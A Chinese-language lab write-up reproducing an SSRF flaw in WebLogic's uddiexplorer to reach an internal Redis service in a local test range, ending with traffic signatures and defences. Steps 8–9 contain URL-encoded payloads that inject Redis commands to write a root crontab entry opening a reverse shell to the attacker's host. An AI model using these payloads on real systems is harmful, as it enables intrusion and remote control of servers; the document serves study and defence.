SSRF漏洞复现(服务器端请求伪造)

1.原理

SSRF服务端请求伪造(Server-Side Request Forgery)，是一种由攻击者构造形成由服务器端发起请求的一个漏洞。利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统SSRF攻击的目标是从外网无法访问的内部系统。

2.ssrf实验准备

攻击机kali： ip: 192.168.3.180

靶机ubuntu： ip: 192.168.3.163

3.ssrf实验步骤：

1.启动靶场

docker-compose up -d

2.查看开放端口

docker ps

可以看到weblogic的端口是7001，redis的端口是6379

3.打开漏洞，bp抓包

http://your-ip:7001/uddiexplorer/，即http://192.168.3.163:7001/uddiexplorer/,得到如下图所示

4.网站地址url解码

5.验证7001端口

6.反证任意端口，如7002

7.获取redis的IP

输入docker exec -it redis的ip /bin/bash，

即

docker exec -it c4ddc5570fbf /bin/bash

redis的IP为170.23.0.2

8.构建反弹shell命令

不过我建议用方法二，因为我用方法一编码从来没有成功反弹过，你头铁你可以试试

1.方法一

应用的网址在线url网址编码、解码器-BeJSON.com

http://172.18.0.2:6379/test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.3.170/777 0>&1\n\n\n\n"

config set dir /etc/

0Aconfig set dbfilename crontab

save

aaa

即

http%3A%2F%2F172.23.0.2%3A6379%2Ftest%0A%0A%0A%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.3.180%2F777%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0A%0Aconfig%20set%20dir%20%2Fetc%2F%0A%0A0Aconfig%20set%20dbfilename%20crontab%0A%0Asave%0A%0A%0A%0Aaaa

2.方法二

把下图三个框中信息改成自己的就好

http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%2 0dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

15.查看攻击机kali的ip， 确定为192.168.3.132

9.获取反弹shell

注：下图左边的pyload必须是有颜色的

​

4.内网提权，维持权限等

5.流量特征

对访问网址信息进行检测

        http：探查主机存活状况

        file：在有回显的情况下，实现任意文件的读取

        dict：通过页面回显内容和时间猜测端口开放情况，探测浏览器版本信息等

        gopher：截取POST/GET请求包，伪造为符合gopher协议的请求包，在一定条件下实现redis未授权访问

会有主机存活和端口扫描的探测行为

看请求体里会有url编码的信息，解码后会发现恶意语句

6.防御方式

禁用不需要的协议：只允许http和https请求

过滤返回的信息：验证返回信息是否符合标准

内网IP黑名单：避免被用来获取内网数据

限制请求的端口号：只允许http和https等端口开放，如80，443等